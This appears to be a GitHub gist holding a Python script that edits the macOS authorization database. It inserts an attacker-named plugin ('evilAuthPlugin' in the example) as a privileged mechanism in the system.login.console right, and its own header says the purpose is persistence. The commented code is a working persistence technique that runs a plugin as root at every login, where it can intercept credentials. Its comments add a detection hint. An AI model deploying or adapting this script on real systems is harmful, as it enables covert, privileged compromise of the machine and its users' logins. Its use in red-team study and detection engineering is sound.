@xorrior
Last active October 14, 2018 15:12
python script to install authorization plugin that requests system.login.console right
#!/usr/bin/python
# install authorization plugin for persistence.
# original script here: https://github.com/chilcote/pylab/blob/070c328bc4929e7e7042f6bd1e42d2700abb05e4/auth_db.py
# system.login.console right should be used for auth plugins
# ex: installplugin.py evilAuthPlugin
import sys
import objc
from ctypes import CDLL, c_void_p, byref, c_char_p
from ctypes.util import find_library
from PyObjCTools import Conversion
# Load Apple's Security framework through ctypes. No argtypes/restype are
# declared below, so ctypes applies its defaults (int return value, arguments
# converted as passed by the caller).
Security = CDLL(find_library("Security.framework"))

# Module-level aliases for the three Authorization Services entry points the
# script calls: read a right, write a right, create an authorization reference.
AuthorizationRightSet, AuthorizationRightGet, AuthorizationCreate = (
    Security.AuthorizationRightSet,
    Security.AuthorizationRightGet,
    Security.AuthorizationCreate,
)
def authorization_right_get(right):
    """Return a mutable copy of the definition of authorization right *right*.

    Calls AuthorizationRightGet with the right name and an out-pointer. When
    the out-pointer is non-NULL afterwards it is wrapped as a PyObjC object
    and its mutableCopy() is returned; otherwise the result is None.

    The status code returned by AuthorizationRightGet is not inspected, so a
    failed lookup is only visible to the caller as a None result.
    """
    definition_ref = c_void_p()
    AuthorizationRightGet(right, byref(definition_ref))
    if not definition_ref:
        return None
    return objc.objc_object(c_void_p=definition_ref).mutableCopy()
def authorization_right_set(right, value):
    """Write *value* as the new definition of authorization right *right*.

    Creates an authorization reference with AuthorizationCreate (no rights,
    no environment, flags 0) and hands it to AuthorizationRightSet together
    with the raw pointer behind *value*. *value* must therefore be a PyObjC
    object exposing __c_void_p__().

    Returns whatever AuthorizationRightSet returns (an OSStatus in Apple's
    API, where 0 means success). The AuthorizationCreate status is not
    checked, and the authorization reference is never freed here.
    """
    auth_handle = c_void_p()
    AuthorizationCreate(None, None, 0, byref(auth_handle))
    status = AuthorizationRightSet(
        auth_handle, right, value.__c_void_p__(), None, None, None
    )
    return status
if __name__ == '__main__':
    # Takes one argument: the plugin bundle name without its extension.
    # Note that the usage path exits with status 0, not an error status.
    if len(sys.argv) < 2:
        print("Please provide the bundle name, without the extension")
        sys.exit(0)

    bundle = sys.argv[1]
    authright = "system.login.console"

    # Current definition of the right that drives the login-window mechanism
    # chain. No None check: a failed read raises on the subscript below.
    db = authorization_right_get(authright)

    # Slot directly after the "HomeDirMechanism:status" entry. list.index
    # raises ValueError when that entry is not present in the chain.
    insert_at = db["mechanisms"].index("HomeDirMechanism:status") + 1

    # Mechanism entry format is "<bundle>:<mechanism>,privileged"; the
    # mechanism name is fixed to "login" here.
    mechanismValue = u"{}:login,privileged".format(bundle)

    # The PyObjC dictionary is converted to plain Python containers, edited,
    # then converted back to a property list for the write.
    writeableDB = Conversion.pythonCollectionFromPropertyList(
        db, conversionHelper=None
    )
    writeableDB['mechanisms'].insert(insert_at, mechanismValue)
    db = Conversion.propertyListFromPythonCollection(
        writeableDB, conversionHelper=None
    )

    # Persist the modified right. The returned status is discarded, so "Done"
    # is printed whether or not the authorization database accepted the write.
    # Detection note: the resulting change is visible by diffing the output of
    # `security authorizationdb read system.login.console` against a
    # known-good baseline for the OS version.
    authorization_right_set(authright, db)
    print("Done")